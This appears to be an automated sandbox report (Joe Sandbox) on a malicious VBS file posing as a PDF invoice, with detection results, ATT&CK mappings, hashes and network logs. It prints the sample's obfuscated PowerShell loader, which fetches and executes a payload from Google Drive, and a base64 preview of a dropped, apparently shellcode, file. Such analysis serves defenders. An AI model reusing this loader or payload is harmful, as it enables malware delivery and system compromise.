        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5544
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4335
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7556 Thread sleep time: -3689348814741908s >= -30000s
        Source: powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllu
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara matchFile source: amsi64_7432.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7432, type: MEMORYSTR
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "<#Ramphastidae Misemphasization Truncal Overvaere Blokdiagram #>;$Pyroheliometer='Fllesspisninger';<#Reform Palegold Slukningsmaterialerne Udrede Brugsklare Majos Coveys #>;$Grubbers=$host.PrivateData;If ($Grubbers) {$mussack++;}function Shouse($Relativity209){$Unsingability=$Fertilizations+$Relativity209.Length-$mussack;for( $Iceboats=5;$Iceboats -lt $Unsingability;$Iceboats+=6){$Forstaaelsesproces+=$Relativity209[$Iceboats];}$Forstaaelsesproces;}function Lnder($Stabl){ . ($Blyantstifter) ($Stabl);}$Nyhedens=Shouse 'ConfeMSkrivoAgg az likfi.heyalTekstlBjlkeaZeugo/Pr he5p lit.Kamer0 ndkr Prel,(FamilW pse iNedf nTipofdCs reoFullywCardosU.gra OvatNA.hilTaudio Frihe1Kirke0Bel,a.Inter0Sho,t;sam,r AdrenWTr baiAphetnMulig6,ultr4Reser;Films ManifxGnidn6Pro y4Se ic;Recom MusikrelgtyvCredu:Jor.a1 Hopl2Amido1Under.Wilde0H,pop)Ko,ma WifeGUstyreEntracFlydek dopyoBacks/Misfo2 Fore0Monos1 V go0Rorpi0 pis1Epi i0Vrdi,1resig AcraFLaconiDukkerUgen,e VillfTad ooHalmlxItc l/Hexac1 rde2trans1Aflas. 
Omg,0Sca p ';$Ddsfjende=Shouse ',oggeusm apsEntheeOptimR ran-UdbinAJord g FishEWakasn.asuntUpgli ';$Ornaterne=Shouse 'BinrvhFod,atMsinktkla,dppsovisP yll:Koord/ ult/ Fo,sd DisprAs riiScapevSundhe Kims.AcoemgContioResoloThr,ugBi delrenoreAsers.TyphlcShivaoPoin,m Tryk/AniliuSprogc C.ba?photoeDemolxF ugtpre oloDrukkrStormt,inan=Ye lodKnub oFnaddwsalnanDativl atioo Besiaacisdd Koll&Eksori nonddMono =Mobil1Per ozLaanej marei eforU Bl,dYCasuiIBesnoFBindeRElfreKSvi.eW atrET ndsmpredeA Shi,YSpeak5Termo8KatarvBa lopSpild5Indv hNab bWV ils7 pancQTestu3UntemT CleaQIn urzEmaljH eleASusp F Varma SemiWSpint ';$citronsommerfuglens=Shouse 'polit>H rry ';$Blyantstifter=Shouse ' EosiiLaendESoralX.emig ';$Qe='bokset';$Iceboatsnformationskanalerne='\Maskes.lea';Lnder (Shouse ',ycon$ nlucgOptaglFejlroCoadmbPat iaProsplInnar:Tra,iUmienbnPneumsin.erediabeaRelatsU.aglo Thern a,rya g,nbbI dsplVanafeN vem= Advo$Var oeWhinsnOrtopvInko :sk smaPrea pS andpD skrd V.isaStivstC anga aagn+Afs u$ Enc.Ih,uchcEilaieAllodbKultuo Ti.faAcleit ambssAtl nnKuwaifSuperoRangsrPapism Stifa And tAk iviCh omoJagthnAnsk,sEpiklkRapteaRubatnFerleaUdkanl Ideee NitrrbrutanUnclieBo,ep ');Lnder (Shouse ' Spre$T rtigR daklFrifio Hjerb P riaUnim lFling:NytnkPkontor O.enoF ededre raunontakrigsbtStegei nchaoOblignMyrmesEspiesrubefyUdlovsPur otTropeeFingimU ati= Some$ OpmaO PalmrAutomn ForbaPuzzltF rskeInh mr .echnNon heCytop.N.opls sladp F ltl logmiGrnsktNring(Knag $ Unsyc,landiTeleft hoorr AfdeolifebnP isisInteroKomplmSt ukmFl,trekadetr Dionf B.lyuIntergForn,lHepateUndernP.ncrsUnbaf) kytt ');Lnder (Shouse 'Dtu.k[DilatN TurteJordbt.hizo.B bliSBegruer.porrC risvDeteriIndvecMatereAcreaPSyen oBrn.tiExternBa.ret VideMKoralaAncomnForuda Bemag F.oreg,lacrBudbr]Lengt:Acco,:BlunkSLavspeMika c ThrouOkku,rT.bloiAvisbtM croySpiliP KragrReseroBannetI hosoBlomscje,nbo Rec,lA.loi Dompr=gumb Livs[Uns lNLoculeArbejtJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
        Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
        Gather Victim Identity Information | Scripting (221) | Valid Accounts | Command and Scripting Interpreter (2) | Scripting (221) | Process Injection (11) | Masquerading (1) | OS Credential Dumping | Security Software Discovery (1) | Remote Services | Data from Local System | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
        Credentials | Domains | Default Accounts | Exploitation for Client Execution (1) | DLL Side-Loading (1) | DLL Side-Loading (1) | Virtualization/Sandbox Evasion (21) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Data from Removable Media | Ingress Tool Transfer (1) | Exfiltration Over Bluetooth | Network Denial of Service
        Email Addresses | DNS Server | Domain Accounts | PowerShell (2) | Logon Script (Windows) | Logon Script (Windows) | Process Injection (11) | Security Account Manager | Virtualization/Sandbox Evasion (21) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (2) | Automated Exfiltration | Data Encrypted for Impact
        Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (2) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (13) | Traffic Duplication | Data Destruction
        Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (1) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
        Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Information Discovery (12) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet

        Source | Detection | Scanner | Label | Link
        11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs | 8% | ReversingLabs | |
        11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs | 5% | Virustotal | | Browse
        No Antivirus matches
        No Antivirus matches
        Source | Detection | Scanner | Label | Link
        drive.usercontent.google.com | 1% | Virustotal | | Browse
        drive.google.com | 0% | Virustotal | | Browse
        Source | Detection | Scanner | Label | Link
        http://nuget.org/NuGet.exe | 0% | URL Reputation | safe |
        http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
        https://go.micro | 0% | URL Reputation | safe |
        https://contoso.com/ | 0% | URL Reputation | safe |
        https://nuget.org/nuget.exe | 0% | URL Reputation | safe |
        https://contoso.com/License | 0% | URL Reputation | safe |
        https://contoso.com/Icon | 0% | URL Reputation | safe |
        https://aka.ms/pscore68 | 0% | URL Reputation | safe |
        https://apis.google.com | 0% | URL Reputation | safe |
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe |
        http://www.apache.org/licenses/LICENSE-2.0.html | 0% | Virustotal | | Browse
        https://www.google.com | 0% | Virustotal | | Browse
        https://drive.google.com | 0% | Virustotal | | Browse
        http://drive.usercontent.google.com | 1% | Virustotal | | Browse
        http://drive.google.com | 0% | Virustotal | | Browse
        http://pesterbdd.com/images/Pe | 7% | Virustotal | | Browse
        https://drive.usercontent.google.com | 1% | Virustotal | | Browse
        https://github.com/Pester/Pester | 1% | Virustotal | | Browse
        Name | IP | Active | Malicious | Antivirus Detection | Reputation
        drive.google.com | 142.250.185.206 | true | false | | unknown
        drive.usercontent.google.com | 216.58.206.65 | true | false | | unknown
        Name | Source | Malicious | Antivirus Detection | Reputation
        https://www.google.com | powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://nuget.org/NuGet.exe | powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe; URL Reputation: safe | unknown
        http://drive.usercontent.google.com | powershell.exe, 00000008.00000002.1444937347.000001D3C5DF4000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://pesterbdd.com/images/Pester.png | powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://go.micro | powershell.exe, 00000008.00000002.1444937347.000001D3C4BDB000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://pesterbdd.com/images/Pe | powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        https://contoso.com/ | powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://nuget.org/nuget.exe | powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/License | powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://contoso.com/Icon | powershell.exe, 00000008.00000002.1462905298.000001D3D41D2000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://drive.googP | powershell.exe, 00000008.00000002.1444937347.000001D3C5DB7000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.google.com | powershell.exe, 00000008.00000002.1444937347.000001D3C5970000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C459B000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.usercontent.googh | powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://drive.usercontent.google.com | powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F5000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        http://drive.google.com | powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
        https://aka.ms/pscore68 | powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://apis.google.com | powershell.exe, 00000008.00000002.1444937347.000001D3C5DE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C45F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DBA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1444937347.000001D3C5DDD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000008.00000002.1444937347.000001D3C4161000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
        https://github.com/Pester/Pester | powershell.exe, 00000008.00000002.1444937347.000001D3C4387000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1469063176.000001D3DC7A0000.00000004.00000020.00020000.00000000.sdmp | false | | unknown
        IP | Domain | Country | Flag | ASN | ASN Name | Malicious
        142.250.185.206 | drive.google.com | United States | | 15169 | GOOGLEUS | false
        216.58.206.65 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
            Joe Sandbox version:41.0.0 Charoite
            Analysis ID:1522523
            Start date and time:2024-09-30 09:58:09 +02:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 4m 41s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:15
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
            renamed because original name is a hash value
            Original Sample Name:11309-pdf.vbs
            Detection:MAL
            Classification:mal100.troj.expl.evad.winVBS@4/4@2/2
            EGA Information:Failed
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 8
            • Number of non-executed functions: 0
            Cookbook Comments:
            • Found application associated with file extension: .vbs
            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, Sgrmuserer.exe, conhost.exe, svchost.exe
            • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
            • Execution Graph export aborted for target powershell.exe, PID 7432 because it is empty
            • Not all processes were analyzed, report is missing behavior information
            • Report size getting too big, too many NtOpenKeyEx calls found.
            • Report size getting too big, too many NtProtectVirtualMemory calls found.
            • Report size getting too big, too many NtQueryValueKey calls found.
            • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
            Time | Type | Description
            03:59:04 | API Interceptor | 45x Sleep call for process: powershell.exe modified
            Match | Associated Sample Name / URL | Detection | Threat Name | Context
            3b5074b1b5d032e5620f69f9f700ff0e | Urgent Quotation Notification_pdf.vbs | malicious | Unknown | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | http://hrlaw.com.au | malicious | Unknown | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | file.exe | malicious | Unknown | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | CAPE MARS VSL'S PARTICULARS.docx.exe | malicious | AgentTesla, PureLog Stealer | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | MV TASOS Vessel's Details.docx.exe | malicious | AgentTesla, PureLog Stealer | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | COMMERCAIL INVOICE AND DHL AWB TRACKING DETAILS.exe | malicious | AgentTesla | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | https://okfun188.com/ | malicious | Unknown | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | https://mukirecords.com/ | malicious | Unknown | 142.250.185.206, 216.58.206.65
            3b5074b1b5d032e5620f69f9f700ff0e | https://thepeaceapproach.net/ | malicious | Unknown | 142.250.185.206, 216.58.206.65
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:data
            Category:dropped
            Size (bytes):64
            Entropy (8bit):1.1940658735648508
            Encrypted:false
            SSDEEP:3:Nlllulbnolz:NllUc
            MD5:F23953D4A58E404FCB67ADD0C45EB27A
            SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
            SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
            SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
            Malicious:false
            Reputation:moderate, very likely benign file
            Preview:@...e................................................@..........
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with no line terminators
            Category:dropped
            Size (bytes):60
            Entropy (8bit):4.038920595031593
            Encrypted:false
            SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
            MD5:D17FE0A3F47BE24A6453E9EF58C94641
            SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
            SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
            SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
            Malicious:false
            Reputation:high, very likely benign file
            Preview:# PowerShell test file to determine AppLocker lockdown mode
            Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            File Type:ASCII text, with very long lines (65536), with no line terminators
            Category:dropped
            Size (bytes):410227
            Entropy (8bit):5.957102992446958
            Encrypted:false
            SSDEEP:12288:dVhovqcGxp1SBpxDr5BeQMTIkcmiDknqP:dVhoZaODlBelchmS3P
            MD5:89FDAFA280B0D5CD9DCE03553A9EAC1D
            SHA1:37ABC1D1A95AADB25C7AD434D668E90D9A4C8784
            SHA-256:37794537620A8DC69D8389B25A0ED40FA0F3774B8E830C1AB4167E76B13FA650
            SHA-512:EF2E4974D76B8AC575B16F6536A94C706A8700D14EEF160AAAA99A235A4C17513ED28CC3E08C30A9AAEE20C523D1833FFBB91F43EB585A9883F9D9F360AB216C
            Malicious:false
            Preview:cQGbcQGbu24TGQDrAvwvcQGbA1wkBOsCX6lxAZu5NgMUfesCFd9xAZuB8aLrNFHrAm6j6wICgYHxlOggLHEBm+sCyTDrAotYcQGbugYUyIXrAtr4cQGbcQGb6wI1JDHK6wLT2nEBm4kUC+sCTTBxAZvR4nEBm3EBm4PBBHEBm+sCcPuB+VJ//wF8zOsCGEZxAZuLRCQE6wLU8XEBm4nD6wK/WesC++uBw42cOQBxAZvrAvgQuglqA8XrAq7F6wLo3YHyoTscQXEBm+sCwkCB8qhRH4TrAiJacQGbcQGb6wK4s3EBm3EBm4sMEOsCQ09xAZuJDBPrAiq/cQGbQusCB/VxAZuB+lzuBAB11usC527rAj/1iVwkDOsCUphxAZuB7QADAABxAZtxAZuLVCQI6wJJdnEBm4t8JARxAZvrAjlfievrAjzFcQGbgcOcAAAAcQGb6wKgN1PrAuqB6wKNfGpA6wKrBXEBm4nrcQGb6wLqQMeDAAEAAACgGwJxAZtxAZuBwwABAADrAtaXcQGbU+sCOejrAkMYietxAZvrAi8wibsEAQAAcQGbcQGbgcMEAQAAcQGbcQGbU+sCGZpxAZtq/+sCz3brAvcxg8IF6wIDP3EBmzH2cQGbcQGbMclxAZvrAo1gixpxAZvrAnESQXEBm+sCCiY5HAp183EBm+sCFMVGcQGb6wJBBIB8Cvu4dd1xAZtxAZuLRAr86wLEVHEBmynw6wJUhesC6z//0usCMrBxAZu6XO4EAOsClJ/rAptcMcBxAZtxAZuLfCQM6wK/uesCdySBNAe+l0uBcQGb6wLduoPABOsCv6jrAoUqOdB143EBm3EBm4n7cQGb6wInO//XcQGbcQGb2BawSPsergBSSqV1uxaPXFVjTtQ3cvJFueJ4AH8DvUWyFrqQkM63AFemm+ECUA+Mvp1icdYWP4y+xyHoXxYnjL4D2Ul6Fj+MvlH7UXoWirjEmEMAV6IxjrbxckI3ElCDvpfz
            File type:ASCII text, with CRLF line terminators
            Entropy (8bit):4.890745395745708
            TrID:
            • Visual Basic Script (13500/0) 100.00%
            File name:11309-#U96fb#U4fe1#U8cbb#U96fb#U5b50#U901a#U77e5#U55ae#U00b7pdf.vbs
            File size:76'002 bytes
            MD5:cd9505a0c492be1e52f012f624835147
            SHA1:bece8abdda5efe16102c4c04d66cb1ab644b0046
            SHA256:9f4e20aa889ca5e2dd1e9107fb07a51fae199a243b3c6b145863913f07d198b0
            SHA512:b0ab14293923b2ca6a06a0c198b42c8f18d463a2e374e230d6a7f9c13afa49cf4c0c9c87b2c4a9687eb5f6ddf2b7644a1f500cf4077148aaa21a3f23effb00be
            SSDEEP:1536:sHyobezwnrkAkPh3JXNP3kK8A+NtZD8A/KtMNVAf:sHyMCAqhtKNtd8bf
            TLSH:73730B1884C43B3539CF335BED410A35C4B9A4147D93ECAF9DA9063D2019C9BB6BAD6E
            File Content Preview:..Rem Omohyoid? stromata? signficance debasingly!..Rem Serbantian? dimers.....Rem Trapperummet smaskede conhydrine! midterfigurernes vav..Rem Zamorine unbalanceable, navnetypes2 kunsthandler? forbiddingness:..Rem Pullers reuter: apperceptionism: effektivi
            Icon Hash:68d69b8f86ab9a86
            Timestamp | Source Port | Dest Port | Source IP | Dest IP
            Sep 30, 2024 09:59:11.626085043 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626131058 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626136065 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626168966 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626200914 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626204967 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626210928 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626247883 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626252890 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626302958 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626334906 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626343012 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626348019 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626384020 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626389980 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626421928 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626456022 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626461983 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626466990 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626504898 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626509905 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626703978 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626733065 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626746893 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626751900 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626781940 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626785994 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626791954 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626826048 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626837969 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626842022 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626882076 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626887083 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626919031 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626951933 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626954079 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626961946 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.626991987 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.626996994 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627029896 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627058983 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627067089 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.627072096 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627105951 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627113104 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.627118111 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627156973 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627163887 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.627167940 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627204895 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627213001 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.627217054 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627258062 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627259016 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.627266884 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.627300024 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628470898 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628530979 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628562927 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628565073 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628572941 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628602028 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628607035 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628638983 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628671885 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628671885 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628680944 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628710985 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628715992 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628742933 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628767014 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628772020 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628799915 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628829002 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628833055 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628838062 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628861904 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628869057 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628918886 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628946066 CEST44349705216.58.206.65192.168.2.10
            Sep 30, 2024 09:59:11.628954887 CEST49705443192.168.2.10216.58.206.65
            Sep 30, 2024 09:59:11.628958941 CEST44349705216.58.206.65192.168.2.10
